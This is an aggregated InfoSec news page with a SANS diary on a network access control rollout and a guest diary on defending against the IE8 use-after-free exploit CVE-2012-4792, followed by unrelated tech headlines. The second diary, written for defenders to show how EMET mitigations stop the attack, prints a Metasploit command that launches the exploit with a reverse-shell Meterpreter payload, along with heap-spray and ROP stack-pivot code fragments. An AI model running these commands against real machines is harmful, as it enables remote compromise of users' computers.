InfoSec News

Further expanding from its core mission of providing Linux distributions for desktop computers and servers, Canonical is developing a version of Ubuntu for smartphones.
(c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Network Access Control (NAC) is a powerful control used to regulate access to corporate network resources. Some of the goals of a NAC implementation are:

Mitigation of zero-day attacks: Devices without antivirus, Host IPS, patches, security baseline or specific software installed considered malicious or against security policies should not gain connection to the corporate network.

Policy enforcement: As NAC use 802.1X technology, it can be used to enforce a specific VLAN for the user and then the network firewall can further enforce access controls inside the corporate network.

Identity and access management: When used with strong authentication, it can enforce that only allowed computers and allowed users from specific computers can enter the corporate network and its resources.

I decided to implement this control inside my corporate network as it solves many of the risks that are affecting or can affect my company. I will tell you in this diary my experience with the implementation and how to determine which NAC solution fits best to your needs. To start, I designed the following test plan to ensure the NAC solution fits into my information security model:
















Network Access Zone (NAZ)







Assigned VLAN to user





Guest VLAN





Guest VLAN






Pre - Admission VLAN






VLAN redirection according to the registration. If MAC is not registered, access is denied.






Lets talk about some definitions about the last table:

Managed: Means if the device is managed by the corporation. Examples are Windows Domain or devices managed by a mobile device management software.

Authentication: NAC authentication can be performed both for user and computer using 802.1X. If 802.1X is not available, MAC addresss is used.

Health: Set of predefined policies to enforce by checking the compliance of the device being authenticated to the network. Health is OK when the device is compliant with the defined policies and its bad when one or more policies are not met.

NAC solution handles two portals:

Guest portal: Used to authenticate devices that are not managed but authorized to enter the network and external users owning or using those devices.

Remediation portal: When the device does not met the required policies, its redirected to the remediation portal as a measure to achieve the non-compliant configurations or parameters inside the device.

Both of the portals implicates that any device authenticating to the network by them is always done manually and no servers or critical devices must authenticate this way.

My experience with NAC implementation goes with the purchase made by My company using Mcafee N-550 boxes. So far, we have had the following problems:

IP Phones must authenticate using 802.1X and voice VLAN must be set and different from the data VLAN. Link Layer Discovery Protocol (LLDP) must be enabled.Check http://www.cisco.com/en/US/docs/switches/lan/catalyst3750x_3560x/software/release/15.0_1_se/configuration/guide/swvoip.html for more information con such configuration in Catalyst 3750 switches and http://www.h3c.com/portal/Technical_Support___Documents/Technical_Documents/WLAN/Access_Controller/H3C_WX3000_Series_Unified_Switches/Configuration/Operation_Manual/H3C_WX3000_CG-6W103/201007/685276_1285_0.htm for H3C devices. Also, please keep in mind that the phone must support the configuration of voice VLAN and data VLAN for the computer device attached to it. Check your IP Phone documentation.

Guest portal does not work in Internet Explorer 8 and 9. It was solved by a patch released by de Mcafee NAC Developer Team.

Out-of-Band redundant configuration duplicates registers of authenticated devices when the redundant nodes activates. First answer we got from Mcafee was that the description of the redundant operation is expected and the only workaround was to place filters under the Threat Analyzer Console. I must admit I was suprised by that answer, because I cannot understand how Mcafee is officialy recommending a manual display filter to the logs loosing the real-time report capabilities to the security event correlator and therefore degrading my incident-response capabilities. I rejected that answer and as of today I am still waiting for a solution.

Authenticated devices with initial bad health state that get fixed wont get new ip address of the VLAN assigned to user because the Radius Change of Authorization (COA) somehow is not correctly working with the NAC solution. Still waiting for an official response for this issue.

So, how can you determine which NAC solution fits best to your needs?

Smooth network integration is SO important. Ensure that your test plan works within your network, that 802.1X operation works smoothly between your radius, switch, device and user. Dont forget to test RADIUS COA and ensure that VoIP devices support 802.1X and specifically voice and data dynamic VLAN configuration. Make sure to have support from your vendor because usually NAC troubleshooting is really low-level and the technical abilities of the support people must be really advanced.

Define your Network Security Policy and test if your NAC tool is able to validate each setting you need for your devices. If you have strange devices that cannot fit into a Windows Domain, ensure 100% that they support at least 802.1X. Otherwise, you will be in trouble by allowing exceptions that might be the start point of your future information security incidents. MAC authentication should not be an option as it can easily be faked.

Make sure the entire NAC process flows and no issues arises like no DHCP negotiation after changing health state from bad to OK.

What is the NAC solution you have found most valuable? Have you had smooth NAC implementations? Let us know!

Manuel Humberto Santander Pelez

SANS Internet Storm Center - Handler



e-mail: msantand at isc dot sans dot org
(c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Following is a guest post from TJ OConnor, author of Violent Python, SANS Technical Institute graduate, and GSE.

So its probably worth talking about the recent IE 8.0 0-day. While the use-after-free exploit specifically targets IE 6 through IE 8 web browsers, its worth of mentioning because of its widespread use in targeted attacks seen in the US, China, and Taiwan. The security company, Fireye found the exploit rigged on a compromised page on the Council on Foreign Relations website among other locations.

As a defender, you probably find yourself asking the wrong question when it comes to defending against this exploit. Is there a patch available? What is the Microsoft approved Fixit solution until a patch can be developed? Is there an antivirus signature for it? Dont fret, as previously noted, Microsoft Tech Net has a temporary fix in place. While useful in preventing this specific attack, the fix is the wrong way of thinking about a solution to the bigger problem. As a defender, you need to start understanding that 0-day is out there. Its going to continue to be out there and you need the mechanisms in-place to stop 0-day. Thats a little arrogant statement considering we define 0-day as a previously unknown computer virus for which antivirus signatures are not yet available. So how do you defend what you cannot define?

To succeed, we must really look at the attack through the eyes of the attacker. The team over at Metasploit recently developed an open source version of the exploit for use in their framework. Lets use it as a starting point to examine how we can prevent this attack without a readily available path (or for that matter prevent further attacks.) We begin our examination by using the Metasploit framework to stand-up a malicious webserver hosting the exploit. The specific command involved starts a handler on our lab host on TCP port 8282. If the exploit succeeds, it delivers the malicious Meterpreter payload to our host on TCP port 1337.

msfcli exploit/windows/browser/ie_cbutton_uaf SRVHOST= SRVPORT=8282 payload=windows/Meterpreter/reverse_tcp LPORT=1337 LHOST= E

We fire up a freshly patched and updated Windows XP Sp3 machine running the newest version of Internet Explorer 8 to serve as a victim to browse to our malicious webserver created by the Metasploit framework.

When a victim browses our malicious server, we see the Metasploit framework sends the malicious HTML page, specifically targeted for Windows XP Sp3 (based on our user agent string.) After about sixty seconds or so of heap-spray, we see the exploit succeeds and opens a Meterpreter session on our victim.

The source code for the Metasploit version of the exploit can be found on their online repository.

Lets examine a couple key aspects in the source before proceeding to understand this particular exploit. We know the particular vulnerability is a use-after-free. Combined with a technique known as heap-spraying, the Metasploit exploit essentially sprays the heap with malicious executable code with the intent to make that code run when the use-after-free crash is triggered. Note the Metasploit exploit source code. First, the exploit defines a payload (the Meterpreter in our case above) and then passes that to a function that creates Javascript code to spray the heap of the Internet Explorer executable process.

def load_exploit_html(my_target, cli)

p = get_payload(my_target, cli)

js = ie_heap_spray(my_target, p)

As you look further into the source code for the exploit, youll notice it also uses a technique known as ROP or Return Oriented Programming. Security researcher Dino Dai Zovi provides an excellent overview of ROP use in exploits in his paper Practical Return Oriented Programming. But essentially, its a technique of using small bits of already existing instructions, followed by a return instruction for a malicious purpose when code cannot be placed on the programs stack because of security mechanisms such as Microsofts Data Execution Prevention (DEP). ROP is commonly used in modern exploits, so its no surprise to see it here. In fact, it uses a common ROP chain, found in the msvcrt dynamic link library to create a stackpivot.

# Both ROP chains generated by mona.py - See corelan.be

case t[Rop]

when :msvcrt

print_status(Using msvcrt ROP)

if t.name =~ /Windows XP/

stack_pivot = [0x77c15ed6].pack(V) * 54 # ret

stack_pivot [0x77c2362c].pack(V) # pop ebx, #ret

stack_pivot [0x77c15ed5].pack(V) # xchg eax,esp # ret # 0x0c0c0c0c


rop_payload = generate_rop_payload(msvcrt, code, {pivot=stack_pivot, target=xp})

At this point, you may start seeing how we need to be protecting against novel exploits such as the recent CVE-2012-4792. We cannot continue to defend against the particular exploit by developing and employing a patch or signature. Rather, we should be defending against the more general technique used in the delivery of the exploit. In this case, we saw a heap-spray as well as a ROP.

The team at Microsoft is equally looking in this direction. Matt Miller from Microsoft gave an excellent presentation this summer how Microsoft Windows 8 would begin defending against exploits, its worth checking out.

Taking a cue from Microsoft, we download and install the Microsoft Enhanced Mitigation Experience 3.5 toolkit from http://www.microsoft.com/en-us/download/details.aspx?id=30424.

EMET is a tool designed by the Microsoft team to specifically look for those mitigation techniques used such as a heap-spray and ROP to bypass popular mechanisms such as Address Space Randomization Layout (ASLR) or Data Execution Prevention (DEP). Firing up the tool, we choose to enable different exploit protection mechanisms such as enforcing hardware-based DEP, ensuring Safe Structure Handling, Detecting Heap-Sprays, In this case, we are going to protect the Internet Explorer 8 web browser attacked in CVE-2012-4792.

Repeating the exploit with EMET 3.5 running, we see an interesting notification before Internet Explorer gracefully terminates. EMET detects the heap-spray and terminates.

Ok. But what if the exploit didnt include a heap-spray? We disable heap-spray detection and repeat the exploit again. This time, we choose to mitigate ROP attacks by looking for a technique known as a StackPivot. (you may remember from the exploit source code). The exploit still fails as EMET detects the StackPivot.

Maybe, it doesnt use a stack pivot. Maybe it uses some unheard of technique that bypass DEP by making a call to one of the several Win32 API calls that can turn off DEP such as VirtualProtect(). Nope! Again, EMET detects the call and notices it has been called from a userland process and not the kernel. It terminates Internet Explorer and notifies the user.

Moral of the story we continue to look at defense in the wrong light. We dont need signatures for every exploit to prevent them from succeeding. We dont need teams developing patches and hotfixes in a 48-hour rush over the New Year holiday. We dont need to race to deploy the patches or hotfixes on production systems. Instead, we need to begin understanding the way attackers attack and the methods and means they use to mitigate exploit protections and attack those methods. Microsoft knows this. Its probably why they hired Matt Miller, originally the third developer at Metasploit. Miller, who published great exploit research including a means for bypassing hardware-enforced DEP has now joined Microsoft in giving us a tool to defend against exploits EMET 3.5. Check it out and start rethinking the way you defend!

TJ OConnor @ViolentPython
(c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
The annual Consumer Electronics Show in Las Vegas gets under way this weekend with big announcements from gadget makers keen to wow and convince us they have the next big thing. But it's worth remembering that some of the promises and predictions made at CES are about as solid as many New Year's resolutions.
Apple will launch the next iPhone in May or June 2013, offering multiple colors and screen sizes in a move that would depart from a six-year practice, a Wall Street analyst said today.
Google and Kia Motors America jointly announced Wednesday a deal to integrate Google Maps and Google Places into Kia automobiles.
The fiscal cliff deal in Congress extended the R&D tax credit, but, once again, sidestepped any move to make it permanent.
Apple's App Store had the top score among mobile application storefronts ranked by ABI Research, but Microsoft's Windows Store narrowly beat the field for its degree of innovation.
Further expanding from its core mission of providing Linux distributions for desktop computers and servers, Canonical is developing a version of Ubuntu for smartphones.
Hewlett-Packard will continue to evaluate potential divestitures of underperforming parts of its business, and the process could get messy, the company warned its investors in its annual 10-K document, which was filed in late December.
Gibbs reviews his predictions from last year and surveys the more than 400 predictions that he's been sent by IT professionals
Maybe you charge through your plans with Patton-like precision, planning everything down to the minute. Or, like Marilyn Monroe, perhaps you've "been on a calendar, but never on time."A It really doesn't matter which approach you take--Google Calendar can fit your style.
Imation, a storage and data security company, has acquired Nexsan, a vendor of disk-based storage systems, in a deal worth about US$120 million, the company announced.
Hewlett-Packard reduced its workforce last year by 17,800 employees, more than half way to its restructuring goal.
Final online usage numbers for 2012 released Tuesday confirmed that Windows 8 failed to match Windows Vista's uptake pace during its first two months.
WordPress WP Photo Album Plus Plugin Cross Site Scripting Vulnerability
[ MDVSA-2013:001 ] gnupg
Tobii Technology will soon start shipping a device that allows users to control a PC using their eyes. Developers will be able to buy the REX next week, and Tobii will make it more widely available in the second half of the year, the company said Wednesday
There were 123 heads of state and governments using Twitter to communicate with citizens and the rest of the world as of December 2012, a think tank said Tuesday.
If poor Wi-Fi performance in your busy office is a problem for your organization, smart Wi-Fi is worth investigating. Here's why one company ripped out it Cisco wireless network gear and went with a new hardware-and-software-based Wi-Fi approach.
Reader Steven Harris is trying to do the right thing by his family, but technical barriers prevent it. He writes:
In the last Ask the iTunes Guy column of the year, I look at playlist views, a quick way to make playlists from folders of songs, adding tags to your tracks, and how to see the duration of selected tracks in iTunes 11.
ShakaCon 2013 - Call for Papers
Re: GnuPG 1.4.12 and lower - memory access errors and keyring database corruption


Top 10 Influencers in Financial InfoSec
Top 10 Influencers in Financial InfoSec. Our Inaugural List of Financial Services Security Leaders. By Tracy Kitten, January 2, 2013. Credit Eligible. Send Email. Tweet Like LinkedIn share. Top 10 Influencers in Financial InfoSec. To acknowledge ...

ircd-ratbox 'm_capab.c' Denial of Service Vulnerability
A multi-year effort to re-architect 47-year-old mainframe-based legacy software around a service-oriented architecture moved from build to buy. Here's why.
U.S. mobile trade group CTIA will combine its two annual trade shows starting in 2014 as it tries to attract a bigger share of the world's interest in smartphones, apps and other hot technologies.
Netflix, which faced an interruption of its video streaming service on Christmas Eve, had problems again on Monday related to its DVD website.
Apple raised CEO Tim Cook's salary by 55% for 2012 and awarded him a $2.8 million bonus, but said the chief executive's pay was still 'significantly below the median' of comparable firms.
A security expert discovered severe vulnerabilities when analysing two Samsung Smart TVs

At the 29C3 hacker congress, Berlin-based security researchers Karsten Nohl and dexter have presented a custom-built workstation for "microprobing" semiconductors; such equipment has so far only been available in specialised labs

Google Chrome Prior to 23.0.1271.64 Multiple Security Vulnerabilities
Internet Storm Center Infocon Status